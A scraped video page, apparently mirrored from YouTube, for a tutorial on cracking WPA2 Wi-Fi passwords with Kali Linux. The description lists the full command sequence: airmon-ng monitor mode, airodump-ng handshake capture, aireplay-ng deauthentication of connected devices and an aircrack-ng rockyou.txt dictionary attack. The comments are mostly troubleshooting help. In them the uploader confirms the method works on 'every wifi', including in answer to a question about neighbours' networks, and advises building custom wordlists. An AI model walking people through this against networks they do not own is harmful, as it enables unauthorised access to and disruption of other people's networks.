Тёмный

Hack WIFI using Kali Linux 100% working | Practical Demo |  

Make Easy
Подписаться 3,1 тыс.
Просмотров 365 тыс.
50% 1

#NetworkHacking #wifihacking
This video shows how to hack wifi (wpa2) and try bruteforce attack and even secure wifi.
Monitoring Mode TP-Link USB Adaptor : • WI-FI- Hacking | TP-li...
Commands:
sudo su
cd /home/kali/Desktop/
iwconfig
airmon-ng check kill
airmon-ng start wlan0
iwconfig
airodump-ng wlan0
airodump-ng --bssid "mac of wifi" --channel 9 --write hack wlan0
Open New Terminal:
aireplay-ng --deauth 25 -a "mac of wifi" -e "mac of connected device" wlan0
cd /home/kali/Desktop/
if rockyou.txt file is in zipped format:
gzip -d rockyou.txt.gz
aircrack-ng hack-01.cap -w /usr/share/wordlists/rockyou.txt
Dark | Deep | Surface Web : • Dark Web vs Deep Web v...
WiFi hacking,
Network security,
Wireless penetration testing,
Cracking WiFi password,
WiFi security vulnerabilities,
Ethical hacking,
Man-in-the-middle attack,
WiFi sniffing,
Wireless network auditing,
Password cracking,
WiFi encryption protocols,
Brute-force attack,
Packet sniffing,
WPA/WPA2 security,
WiFi cracking tools,
WiFi hotspot security,
Wireless network reconnaissance,
Rogue access points,
Wireless network intrusion detection,
WiFi cracking tutorials,
► Disclaimer:- [Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use]
Channel Description :
Make Easy
This channel is created to make any concept easier.
#koolsantosh #makeeasy
IF This video is helpful then
..................................................................
Like Subscribe Comment & Share
..................................................................

Наука

Опубликовано:

 

11 апр 2023

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 463   
@DavidBanner-gp2wp
@DavidBanner-gp2wp 9 месяцев назад
i have a alfa awus036acs wifi adapter and i cannot get it to work in Kali linux. I have watch several videos and nothing helps can you assist
@MakeEasyy
@MakeEasyy 9 месяцев назад
I haven't used that model...
@user-nb5jl5qb7x
@user-nb5jl5qb7x Год назад
Can u help me I can not find any WIFI networks, I have TPlink USB WIFI adapter and it is in Mode:Monitor Frequency, what should be the reason?
@MakeEasyy
@MakeEasyy Год назад
Trouble shooting methods: 1) update and upgrade your system and try again 2) reinstall drivers for wifi adapter and try again 3)install fresh os in virtual box or VMware and try again NOTE : All the steps are shown in this video so don't skip any part. It will work 100% For setup process: ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-hijn9QMAY_w.html
@rdl8620
@rdl8620 8 месяцев назад
it's old way.... depende if you have exact password in the file of passwords, if password is not there, then go to neighbours and ask for password and write it on the file, like that the cracking will be successful
@roolee2k
@roolee2k 8 месяцев назад
exactly. do you know the new way ?
@keyurjoshi9382
@keyurjoshi9382 5 месяцев назад
😂😂
@aakashpanchal5294
@aakashpanchal5294 5 месяцев назад
Ye shi h😂
@milkcoffee-h8g
@milkcoffee-h8g 2 месяца назад
True
@MrMe944
@MrMe944 2 месяца назад
known as wordlist attack
@HubertHafenbrugger
@HubertHafenbrugger 6 месяцев назад
this method is already obsolete with WPA3. Or with long passwords (not in a list) you can forget that method..
@RohitMourya-nu4uh
@RohitMourya-nu4uh 11 месяцев назад
Can you dencrypt password in handshake file by any other method rather than brute force ? Because by using this method its shows keys not found.
@MakeEasyy
@MakeEasyy 11 месяцев назад
You need to make new wordlist using different methods so, you will found your matching password
@LTDESP17
@LTDESP17 5 месяцев назад
He's not using a Bruteforce attack he's doing a Wordlist/Dictionary attack. If you have decent hardware learn an actual Bruteforce attack, hybrid attack, phishing, or if AP has WPS version one enabled use reaver.
@narutouzamaki1945
@narutouzamaki1945 17 дней назад
bro do I still have to download the txt file and aircrack-ng?
@shahnawazali1502
@shahnawazali1502 8 месяцев назад
my ssid are not showing, it worked at the first time but when i tried again thoae are not showing again
@trippybandz7580
@trippybandz7580 3 месяца назад
I have this issue too but I think it needs an adaptor
@shahnawazali1502
@shahnawazali1502 3 месяца назад
@@trippybandz7580 change the wifi adaptor
@user-vm4mv3se3r
@user-vm4mv3se3r 2 дня назад
When I try this process The Bssid was ( not associated) What can cause that
@3duchannel
@3duchannel 6 месяцев назад
I need an USB wireless antena?
@cleberiack5840
@cleberiack5840 9 месяцев назад
Thank you so much for the excellent class. I haven't seen your previous tutorial, but I'll look it up now. I'm from Brazil. Thank you very much.
@MakeEasyy
@MakeEasyy 9 месяцев назад
Thank for your feedback. Please share
@GabrielJasonWhitemumba
@GabrielJasonWhitemumba 9 месяцев назад
okay sir I'm from Zambia
@Abhishekaarya026
@Abhishekaarya026 Год назад
When I typed the airodump-ng wlan0 command it is showing faild no such devices and failed initilizing wireless card wlan0 ? Please help.
@MakeEasyy
@MakeEasyy Год назад
Install drivers firstly by following my another video of enabling monitor mode and follow this video... It will be done
@puthykun594
@puthykun594 Месяц назад
@makeEasyy what's is driver sir?
@ucsnow8922
@ucsnow8922 9 месяцев назад
It gives unable to process this ap what does it means?
@shivam_editz_121
@shivam_editz_121 2 месяца назад
Sir, i try this but showing on me interface wlan0 down and read failed : network is down.
@MakeEasyy
@MakeEasyy 2 месяца назад
You need to make network interface up, Cmd: Ifconfig ifconfig wlan0 up
@chaostheory3011
@chaostheory3011 Год назад
It is much easier to just use fern which kali already comes with, does the exact same thing as this except everything is automated.
@jonasayesahpaddy7763
@jonasayesahpaddy7763 Год назад
How explain
@johannardox
@johannardox 11 месяцев назад
but it is neccesary for newbies to learn about the process to understand the whole , promts, commands , MACs etc.
@GabrielJasonWhitemumba
@GabrielJasonWhitemumba 9 месяцев назад
thank youguys
@GabrielJasonWhitemumba
@GabrielJasonWhitemumba 9 месяцев назад
okay how
@ismailsongadhiya007
@ismailsongadhiya007 6 месяцев назад
I run command but it doesn't work it not showing any WiFi connection But as I can see in my settings there are 2 WiFi connections are there in my area
@dinogamingdg7673
@dinogamingdg7673 5 месяцев назад
Have to use a wifi stick
@demiladedickson6896
@demiladedickson6896 7 месяцев назад
MUST i be connected by cable cause i am connected to a wifi network . mine did not show wlano
@MakeEasyy
@MakeEasyy 7 месяцев назад
It works even if you are connected using wifi
@yasteseryal609
@yasteseryal609 9 месяцев назад
when put the bsssd and channel then enter the result as airodump --ng for help for help what can i do?🙏
@MakeEasyy
@MakeEasyy 9 месяцев назад
Try again with correct bssid , ND type correct command
@tnunited2436
@tnunited2436 3 месяца назад
im having trouble on last part the dictionary option -w its written please specify a dictionary. what can i do? to extract the wordlist. thanks if u can make a video on it it would be really appreciated
@Abcdefghi506
@Abcdefghi506 3 месяца назад
Google search rockyou. Txt
@MakeEasyy
@MakeEasyy 3 месяца назад
Get rockyou.txt file from github
@sadsad-fv6ep
@sadsad-fv6ep Год назад
I don't have usb wifi adapter how can i follow that command using built-in wireless if im using hyper-v
@MakeEasyy
@MakeEasyy Год назад
Can't using builtin wireless adapter. But u can try in virtual machine
@DIGITALHUBp
@DIGITALHUBp Год назад
my latop is not showing any network in cmd but there are many singnals availble in wifi button
@MakeEasyy
@MakeEasyy Год назад
You need extrenal usb wifi adapter....which supports monitor mode.. Then it will work. Normal wifi of laptop won't support monitor mode...
@chessli369
@chessli369 6 месяцев назад
Interface wlan0 dow so what we do that not work
@dynamicawan
@dynamicawan Год назад
Hello sir. I did everything right but after i put the "airodump-ng" bssid command it only shows the router not the clients when litrelly 4 devices are connected to that network. Please answer with a solution.
@MakeEasyy
@MakeEasyy Год назад
Restart router and try again...
@ayanasim761
@ayanasim761 10 месяцев назад
First try the command : airmon-ng check kill 9:41
@101onthe9
@101onthe9 10 месяцев назад
Question , with the iwconfig how do I get the wlan0 to pop up. I’m kinda new to this
@MakeEasyy
@MakeEasyy 10 месяцев назад
If you have connected wifi adapter, then it will be displayed
@nandulal5576
@nandulal5576 9 месяцев назад
​@@MakeEasyywithout wifi adapter we can hack the password
@roolee2k
@roolee2k 8 месяцев назад
this is the same question I asked to every "hack wifi kali linux tutorial in RU-vid. You can crack it because you already insert your own password into that rockyou.txt file. What if the password is in another language, made-up word, or even in form of numbers? how do you resolve that ?
@MakeEasyy
@MakeEasyy 7 месяцев назад
this is 2nd process, your question is genuine, we need to create a wordlist first, by gathering information about the person or user.
@shivamsaxena8447
@shivamsaxena8447 7 месяцев назад
Then you have to do bruteforce
@syedalihaider7144
@syedalihaider7144 Год назад
After this command Airodump-ng wlan0 its scanning networks but under this, Its showing BSSID (not associated) instead of connected device's MAC address.
@MakeEasyy
@MakeEasyy Год назад
Follow instructions and redo... It will work...100%
@syedalihaider7144
@syedalihaider7144 Год назад
@@MakeEasyy tried so many times but failed... I think there's something wrong with my Wifi Chipset. I'll try on another one
@shriyanshgupta-5812
@shriyanshgupta-5812 9 месяцев назад
@@syedalihaider7144 use monitor mode supported wifi adapter
@GustavJensen30
@GustavJensen30 6 месяцев назад
When I type "iwconfing" it only displays "lo no wireless extensions. eth0 no wireless extensions." how come?
@tonikidane7101
@tonikidane7101 5 месяцев назад
to enable wireless functionality in kali u need to install appropriate wireless driver specifically the compact-wireless driver.
@msa-vp2hn
@msa-vp2hn Месяц назад
How to downloading kali Linux?? Will it worl for mobile
@VikAsPhogaT
@VikAsPhogaT 8 месяцев назад
i did not got your last line - w and then wordkist, from where i can get that
@MakeEasyy
@MakeEasyy 7 месяцев назад
for wordlist use link: github.com/zacheller/rockyou
@fact3064
@fact3064 4 месяца назад
Bro now I have new error 😢 It is showing that failed to open handshake file which I capture , no such file or directory
@MakeEasyy
@MakeEasyy 4 месяца назад
Write proper folder path... Absolute or relative , but it must be correct
@animehunter999
@animehunter999 Год назад
Do I need to learn programming languages,networking before going into hacking ? Or I can just learn hacking without having knowledge of programming languages
@MakeEasyy
@MakeEasyy Год назад
You can start with basic knowledge
@Kezo-cv5uu
@Kezo-cv5uu 3 месяца назад
Thanks bro its perfectly working for me❤
@MakeEasyy
@MakeEasyy 3 месяца назад
Share this...
@christianbasa1391
@christianbasa1391 11 месяцев назад
It is ok to use the TP-Link N150 TL-WN722N wifi wireless adapater?
@MakeEasyy
@MakeEasyy 11 месяцев назад
Ok..if it supports monitor mode
@zainmurtaza7118
@zainmurtaza7118 Год назад
Sir in start when i type (sudu su) then could not find command show in terminal...whats the problem plz guide
@MakeEasyy
@MakeEasyy Год назад
It is: sudo su
@zainmurtaza7118
@zainmurtaza7118 Год назад
​@@MakeEasyysir when I type (iwconfig) then wlan0 not show..what's the problem please guide
@xavy-loco
@xavy-loco 7 месяцев назад
​@@zainmurtaza7118😂😂😂
@ajwadjilal6831
@ajwadjilal6831 10 месяцев назад
In the last step its showing “ Please specify a dictionary (option -w) “ whats wrong?
@MakeEasyy
@MakeEasyy 10 месяцев назад
Firstly extract the password file which is in zip format. Then goto that directory using CD And try again
@mynameshrl
@mynameshrl Год назад
means we have to use router to have wlan0? is the handshake file automatically saved to our device after successfully capturing the handshake file?
@MakeEasyy
@MakeEasyy Год назад
Yes.... And You need to use " usb wireless adaptor " which supports monitor mode
@abhay4896
@abhay4896 11 месяцев назад
Hey my adapter doesn't support monitor mode My adapter is of 2 dollars of zebronics But when I asked on discord they share me some driver link What is that please tell me
@rayrayk4561
@rayrayk4561 9 месяцев назад
Hi, great tutorial, however im having a problem when I execute ‘airodump-ng -bssid -channel -write hack wlan0’. It shows the specified bssid however next to the time/date there is a “fixed channel wlan0: [number]” and this means when I run the deauth and a WPA handshakes shows it will immediately switch to another channel. This also makes it very difficult to execute the deauth. Any help would be appreciated
@Sasan.Mobarez
@Sasan.Mobarez Год назад
If it was so easy that all people hacking wirelessly, you put your password in the password list, four to one, you wouldn't do it. If you were, you would hack with a script.
@zainmurtaza7118
@zainmurtaza7118 Год назад
Sir in start when i type (sudu su) then could not find command show in terminal...whats the problem plz guide
@sairammoharle
@sairammoharle 10 месяцев назад
​@@zainmurtaza7118it's not #sudu su it's #sudo su
@gersonesperida4708
@gersonesperida4708 10 месяцев назад
​@@zainmurtaza7118it was supposed to be Sudo
@novacame9718
@novacame9718 10 месяцев назад
@@zainmurtaza7118 It's sudo su
@GabrielJasonWhitemumba
@GabrielJasonWhitemumba 9 месяцев назад
okay how
@habiburrehman948
@habiburrehman948 8 месяцев назад
Good job but bro please tell me how are you using linux as a pop up window in wondows 10/11 please reply me as soon as possile
@MakeEasyy
@MakeEasyy 8 месяцев назад
Using virtual box....
@habiburrehman948
@habiburrehman948 8 месяцев назад
thanks @@MakeEasyy
@MohammedSabeerCivilEngineering
@MohammedSabeerCivilEngineering 11 месяцев назад
Bro but while using adapter in monitor mode the network manager service is going off again and again adapter(tp link WN722N
@MakeEasyy
@MakeEasyy 11 месяцев назад
Shut it down using a command and then restart it..
@MohammedSabeerCivilEngineering
@MohammedSabeerCivilEngineering 11 месяцев назад
@@MakeEasyy i tried many time but also same issue
@azharuddin1st
@azharuddin1st 3 месяца назад
i have no wlan0 , only lo and etho is show ............., solve this
@akashxa2698
@akashxa2698 27 дней назад
search the same issue in youtube u will get solved
@MR_MRX1
@MR_MRX1 Год назад
airodump-ng wlan0 Warning: Detected you are using a non-UNICODE terminal character encoding. Failed to connect to generic netlink. socket(PF_PACKET) failed: Permission denied Failed initializing wireless card(s): wlan0 Brother gives this error
@MakeEasyy
@MakeEasyy Год назад
Follow instructions sequentially you won't get error...
@Manshika_Coder
@Manshika_Coder Год назад
Can i followed this command if I am using kali linux on virtual machine.
@MakeEasyy
@MakeEasyy Год назад
Yes...u can...I did the same
@mohsinvoice
@mohsinvoice 9 месяцев назад
Bro I face big problem... when airodump-ng wlan0 (enter) problem (interface wlan0 down)
@MakeEasyy
@MakeEasyy 9 месяцев назад
Airmon-ng start wlan0 Run this command
@kushalkundu2142
@kushalkundu2142 5 месяцев назад
After sudo su root access not show now what what I do?
@EmpireSigma_shorts
@EmpireSigma_shorts 2 месяца назад
bro set password kali
@nri_raj
@nri_raj 6 месяцев назад
I am using this kali in VirtualBox of Mac, do I need external router?
@MakeEasyy
@MakeEasyy 6 месяцев назад
Yes...you need additional usb adapter which supports monitor mode
@nri_raj
@nri_raj 6 месяцев назад
@@MakeEasyy do you know some models?
@TheRedAd
@TheRedAd Год назад
airodump-ng not working .how solve it? when enter not show any wi-fi.
@MakeEasyy
@MakeEasyy 11 месяцев назад
It is inbuilt command so, Run update and upgrade command and retry
@ayseaf
@ayseaf 7 месяцев назад
every time i use this command " airodump-ng wlan0 " my network disconnected , why ?
@MakeEasyy
@MakeEasyy 7 месяцев назад
which network?, just restart the network service and try again. using command: sudo systemctl restart network.service sudo service networking restart
@samsung-ws8lr
@samsung-ws8lr Год назад
Try it with inifnite deauth but no handshake happening. Whats the pb plz ?
@MakeEasyy
@MakeEasyy Год назад
Device must retry for the connection... So, try with your own Device... Disconnect it and connect back again.... Handshake will be captured.... #try_thrice
@ankushsharma1843
@ankushsharma1843 Год назад
How to fix channel changing issue because channel change frequently and that's the reason not capturing handshake
@MakeEasyy
@MakeEasyy Год назад
Actually it won't changed.. Or you can open router settings and configure it.. Just by typing ip address in the browser
@veds4944
@veds4944 Месяц назад
Can we use this method to know all the unsaved wifi in my computer near me
@MakeEasyy
@MakeEasyy Месяц назад
Yes...possible
@fuel2687
@fuel2687 8 месяцев назад
What if the password is some indian name or something which is personal to the owner? Will it still be able to crack it?
@MakeEasyy
@MakeEasyy 8 месяцев назад
Yup...create wordlist first and then try...it works
@funnyreels.98
@funnyreels.98 3 месяца назад
I facing a issue "please specify a dictionary (option -w ) " how to fix it ?
@MakeEasyy
@MakeEasyy 3 месяца назад
Simply extract rockyou.txt file and specify absolute(full) path....then it works
@arslannawaz1303
@arslannawaz1303 Год назад
After entering iwconfig there is no wlan0 is showing kindly guide me
@MakeEasyy
@MakeEasyy Год назад
Please connect usb wifi adapter which must support monitor mode. Then it will show... Please follow instructions shown in video..
@zainmurtaza7118
@zainmurtaza7118 Год назад
sir when I type (iwconfig) then wlan0 not show..what's the problem please guide
@MakeEasyy
@MakeEasyy Год назад
Please follow all the steps ...from beginning it works
@xavy-loco
@xavy-loco 7 месяцев назад
bro you are a pain in the ass!!! 😂😂😂
@shokirjonovoffical
@shokirjonovoffical 5 месяцев назад
bro that is only hack to connected wifi ?or every wifi can you give information about it
@MakeEasyy
@MakeEasyy 5 месяцев назад
Every wifi...
@Luanlogy
@Luanlogy 4 месяца назад
irodump-ng wlan1 >>>>>>>> socket(PF_PACKET) failed: Operation not permitted This program requires root privileges. Failed initializing wireless card(s): wlan1 how to solve bro??
@MakeEasyy
@MakeEasyy 4 месяца назад
Give root user permissions: Sudo su
@NizamulMulk-BD
@NizamulMulk-BD 8 месяцев назад
1:58 which key is used in back typing mode?
@alexanderissaiahmamadoa2509
@alexanderissaiahmamadoa2509 4 месяца назад
ctrl+c
@fuel2687
@fuel2687 9 месяцев назад
What if I don't have a external wifi adaptor? Is their a method without it?
@MakeEasyy
@MakeEasyy 9 месяцев назад
No..
@gorillawarzone4558
@gorillawarzone4558 5 месяцев назад
i dont have wlan1 or wlan0 on my laptop #
@TecheiMouse
@TecheiMouse 8 месяцев назад
bro I am able to capture the handshake file, but can't find the key, I have extracted the rockyou.gzip file but i am unable to crack it says- 1 potential targets Packets contained no EAPOL data; unable to process this AP. Quitting aircrack-ng.. ?? what to do???
@MakeEasyy
@MakeEasyy 7 месяцев назад
firstly extract the worlist, using the command given in video description or any from internet then you can use that file, or simply download it: github.com/zacheller/rockyou
@kreesky
@kreesky 7 месяцев назад
It seems I am unable to capture the handshake. I am deauthing correctly and fixed channel wlan0: is moving however it never captures the handshake. I did see once for a split second "handshake captured" but it went back to the numbers again. Any advice?
@MakeEasyy
@MakeEasyy 7 месяцев назад
If your password matches in the Rockyou.txt file, it will capture handshake... and then just stop the process
@abhimanyukashyap9828
@abhimanyukashyap9828 Месяц назад
How to extract the zip file in the video at 8:27
@leopard_gaming
@leopard_gaming Год назад
After airdump-ng wlan0 It's failed and reason is device or resource busy so what I do
@MakeEasyy
@MakeEasyy Год назад
U need external usb adaptor... Which support monitor mode
@leopard_gaming
@leopard_gaming Год назад
@@MakeEasyy can you explain in a video?
@sahil_v3474
@sahil_v3474 4 месяца назад
it is showing no bssid available anyone knows anything?
@rabbit_os
@rabbit_os 9 месяцев назад
Which wifi adapter I need to use client was not showing!
@MakeEasyy
@MakeEasyy 9 месяцев назад
Tp link wifi adapter which supports monitor mode
@user-tz9ex5vw8l
@user-tz9ex5vw8l 3 месяца назад
do i need any wifi router or adapter while doing these process
@MakeEasyy
@MakeEasyy 3 месяца назад
Wifi adapter is needed which supports monitor mode
@remil2006
@remil2006 9 месяцев назад
Hello, when i write iwconfig do not show me any name that star with wlon0
@MakeEasyy
@MakeEasyy 9 месяцев назад
You need to connect wireless adapter for that
@Cocyared
@Cocyared 2 месяца назад
@@MakeEasyy 😂corectly
@VikAsPhogaT
@VikAsPhogaT 8 месяцев назад
after iwconfig , wlan0 is not showing
@FarihaNisha-tv5ew
@FarihaNisha-tv5ew 2 месяца назад
I have same problem
@fiutt2199
@fiutt2199 2 месяца назад
after typing airodumg-ng wlan0 no wifi network showing
@abiyetkhan3867
@abiyetkhan3867 18 дней назад
Yeah bro sm problem
@adibafinance2498
@adibafinance2498 6 месяцев назад
i dont see any stations on my network
@user-qs1gd2sp8f
@user-qs1gd2sp8f 9 месяцев назад
it works only if user already connected on wifi or if not?
@MakeEasyy
@MakeEasyy 9 месяцев назад
Yes a user is required...
@toxicshrma3637
@toxicshrma3637 Месяц назад
its not showing any ssid when airodump-ng start wlan0 please helps ir
@toxicshrma3637
@toxicshrma3637 Месяц назад
please help me i think something is stopping my wifi
@SmokeyNagata-lz2xs
@SmokeyNagata-lz2xs Год назад
Does Killer Wi-FI 6 AX 1650i 160MHz support it?
@MakeEasyy
@MakeEasyy Год назад
Check specifications of your adaptor in the internet
@GamingWithZarif
@GamingWithZarif Год назад
You crack the same wifi which is already connected to your device..Is it work on others wifi?
@MakeEasyy
@MakeEasyy Год назад
Not the same......... but i tried in my own network...
@GamingWithZarif
@GamingWithZarif Год назад
@@MakeEasyy is it work in others wifi?
@MakeEasyy
@MakeEasyy Год назад
Yes absolutely ok
@shahi2431
@shahi2431 Год назад
Is Android Kali Linux and pc Kali Linux both same or not ?
@MakeEasyy
@MakeEasyy Год назад
You can use...termux in android to run or execute kali linux commands... Its same but some limitations are there...
@shahi2431
@shahi2431 Год назад
@@MakeEasyy where are you from bro?
@MakeEasyy
@MakeEasyy Год назад
@@shahi2431 im from nepal
@lordPoison-s2f
@lordPoison-s2f 3 дня назад
I have performed it but there is no wifi network name or address is coming only empty list is displaying.
@ghassenhammami5424
@ghassenhammami5424 22 часа назад
disconnect the adapter and reconnect it (devices/usb...) and try again
@emanarshad5577
@emanarshad5577 8 месяцев назад
Sir it doesn't shown me any wifi network after running command airodump-ng wlan0
@prasadankit129
@prasadankit129 Год назад
If i type iwconfig then it showing only lo and eth0, it is not showing wlan0
@user-jx4mq6tw2m
@user-jx4mq6tw2m Год назад
Me too
@MakeEasyy
@MakeEasyy Год назад
Do 1 thing... First connect your wireless adapter which supports monitor mode to your laptop... And attach to virtual machine by watching my previous video... and do configuration. Part 1: ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-hijn9QMAY_w.html
@user-cg2zu1cv6o
@user-cg2zu1cv6o 10 месяцев назад
I have not get any handshake just show interface wla0 down so what can i do?
@MakeEasyy
@MakeEasyy 10 месяцев назад
Make it up first.... Wlan0 must be up to capture
@MakeEasyy
@MakeEasyy 10 месяцев назад
Make it up... Wlan0 must be up in order to capture handshake file..
@user-cg2zu1cv6o
@user-cg2zu1cv6o 10 месяцев назад
@@MakeEasyy command?
@shame4049
@shame4049 Год назад
How come i can go into monitor mode but i dont have a wifi adapter and when i try to crack it it says packets contained no eapol data unable to process this AP
@MakeEasyy
@MakeEasyy Год назад
You need wifi adapter.... which supports monitor mode
@nihonmaksudur7662
@nihonmaksudur7662 10 месяцев назад
Why on my pc doesn't recognize commands From airodump ng mack address??!
@MakeEasyy
@MakeEasyy 10 месяцев назад
Use - : airodump-ng Type correct command... It works
@rayrayk4561
@rayrayk4561 9 месяцев назад
Hi, great tutorial, however I’m having some problems when i execute “airodump-ng -bssid -channel -write hack wlan0” where it shows everything as it should but also shows a “fixed channel wlan0 [number]” next to the date/time. This number keeps changing very fast as it cycles through channels making executing the deauth command very difficult. Also means if a WPA handshake appears it will immediately disappear as it changes channels. Much appreciated if you could help as I can’t find a solution on the forums. ❤
@MakeEasyy
@MakeEasyy 9 месяцев назад
Channel number wont change... When handshake captured... then exit running command... And then process it.. Execute deauth 15 to 20 times only.
@kreesky
@kreesky 7 месяцев назад
I have the same issue. Any fixes?
@CarTody
@CarTody 6 месяцев назад
Write airodump-ng wlan0 then type everything if solve then comment 💫
@kushwaha079
@kushwaha079 5 месяцев назад
You hv to do only Just buy a wifi connection 😅😅 and fix your problem
@fact3064
@fact3064 4 месяца назад
Bro can you tell me how to extract file which you are telling at 8:31 Please bro help me
@MakeEasyy
@MakeEasyy 4 месяца назад
www.google.com/amp/s/www.geeksforgeeks.org/how-to-extract-rockyou-txt-gz-file-in-kali-linux/amp/ This article will solve your problem
@fact3064
@fact3064 4 месяца назад
Thanks bro
@djnikx1
@djnikx1 9 месяцев назад
🤣 haven't seen such an easy password to crack yet! but the process of cracking it is correct.
@MakeEasyy
@MakeEasyy 9 месяцев назад
Hehehe... Thank you
@just_a_dreamer369
@just_a_dreamer369 11 месяцев назад
What is the USB device, which showing in the 1:13 ? 🤔
@MakeEasyy
@MakeEasyy 11 месяцев назад
Tp link wifi adapter which supports monitor mode
@just_a_dreamer369
@just_a_dreamer369 10 месяцев назад
@@MakeEasyy Thank you !
@leopard_gaming
@leopard_gaming Год назад
External adapter is required?
@MakeEasyy
@MakeEasyy Год назад
Yes
@Abtechnology0
@Abtechnology0 8 месяцев назад
How I can quitting after I run airodump-ng wlan0
@Madaruchiha875
@Madaruchiha875 4 месяца назад
Ctrl+c
@bcseditz1571
@bcseditz1571 4 месяца назад
if pass is complicated this will work same ?
@MakeEasyy
@MakeEasyy 4 месяца назад
Yea...need to generate password file....with any available programs
@yashpalhare8654
@yashpalhare8654 Год назад
i run iwconfig and he showing two wlan0 and wlan1 what problems
@MakeEasyy
@MakeEasyy Год назад
One inbuilt of computer and next USB attached .....so no issue... Continue with next steps
@yashpalhare8654
@yashpalhare8654 Год назад
But next step follow and they WiFi networks available but he can't scanned wifie networks
@shaheerhaider-lh7yc
@shaheerhaider-lh7yc 10 месяцев назад
Can i hack without having a USB Wireless Adapter?
@MakeEasyy
@MakeEasyy 10 месяцев назад
No
@thevideos793
@thevideos793 11 месяцев назад
after enter SUDO SU what password i do enter?? kindly help please
@MakeEasyy
@MakeEasyy 11 месяцев назад
If you are using kali linux. Then use kali as password
@user-ef9iq5jw7j
@user-ef9iq5jw7j 8 месяцев назад
after iwconfig ......wlan0 not showing !
@user-eh6uu7gv9s
@user-eh6uu7gv9s 3 месяца назад
yes bro same problem
@user-ef9iq5jw7j
@user-ef9iq5jw7j 3 месяца назад
@@user-eh6uu7gv9s you have to use external adapter !
@banajithuzuri9213
@banajithuzuri9213 8 месяцев назад
Only channel is geeting changed, no handshake file captured..wasted 2 hrs
@im_Vjy
@im_Vjy Месяц назад
wlan0 is not Showing in my Laptop
@eliastibebu7411
@eliastibebu7411 9 месяцев назад
thats dictionary word attack not brute force and if it cant find from 14.3 million list it wont show
@MakeEasyy
@MakeEasyy 9 месяцев назад
Takes time
@salmankk-w8f
@salmankk-w8f Месяц назад
I have a doubt here...if we couldn't find the password after decrypt....what was the next task to perform to crack
@MakeEasyy
@MakeEasyy Месяц назад
Create a possibility passwordlist any tool, python or any other
@RAZA-tm5yh
@RAZA-tm5yh Месяц назад
I m not getting any network information 😢😢😢
@miladrasoli7866
@miladrasoli7866 7 месяцев назад
Hey Bro you hacked the wifi that you already connected, did catch my speak? Can we hack our nighbor wifi, is it possiable to hack every wifi?
@miladrasoli7866
@miladrasoli7866 7 месяцев назад
You know why I don't have Kali Linux I wanna download it and I wanna be sure that is it possible to hack?
@MakeEasyy
@MakeEasyy 7 месяцев назад
I am not connected to that network. And important point is: this is bruteforce attack, And in this you must have password list.. or you can generate it using a different methods to do so... It works
@Aarush4712
@Aarush4712 Год назад
Sir can I try it on a new kali linux as I am using kali linux for first time
@MakeEasyy
@MakeEasyy Год назад
Yes...you can try... It will work for you...
@Aarush4712
@Aarush4712 Год назад
Ok thanks
@its____ayann
@its____ayann Год назад
​@@Aarush4712 bro it's work or not ??
@gerardoperez6787
@gerardoperez6787 Год назад
​@@its____ayann😂😂
@chandrashekarbalajiaeluri1831
@chandrashekarbalajiaeluri1831 Месяц назад
Did you used wire less card
@MakeEasyy
@MakeEasyy Месяц назад
Yes...
@johannardox
@johannardox 11 месяцев назад
what happen if the password is not in the wordlist?
@MakeEasyy
@MakeEasyy 11 месяцев назад
Need to create wordlist by gathering information about the person
@johannardox
@johannardox 11 месяцев назад
interesting process but I think this method is useless nowadays, on the other hand bruteforce is tediosly slow (it means it is good wifi owners) maybe this is the reason hackers prefers using phishing attacks as a social hacking... Nice video, I learned a lot ! , @@MakeEasyy
@Mountainredcandie
@Mountainredcandie 11 месяцев назад
is it possible to do it without any usb adaptor?
@MakeEasyy
@MakeEasyy 11 месяцев назад
You need adaptor, because adaptor support monitor mode..
@Mountainredcandie
@Mountainredcandie 11 месяцев назад
Thank you so much@@MakeEasyy
Далее
3 Levels of WiFi Hacking
22:12
Просмотров 1,8 млн
Password Hacking in Kali Linux
24:22
Просмотров 773 тыс.
Who has the Worst Setup at Linus Tech Tips
29:05
Просмотров 754 тыс.
Cracking WiFi WPA2 Handshake
13:29
Просмотров 2 млн
How Hackers Move Through Networks (with Ligolo)
20:01
Просмотров 261 тыс.
let's hack your home network // FREE CCNA // EP 9
30:16
Dangerous Hacking Gadgets in 2024 #hacker #tools
11:20
Просмотров 499 тыс.
Remotely Control Any Phone and PC with this Free tool!
17:15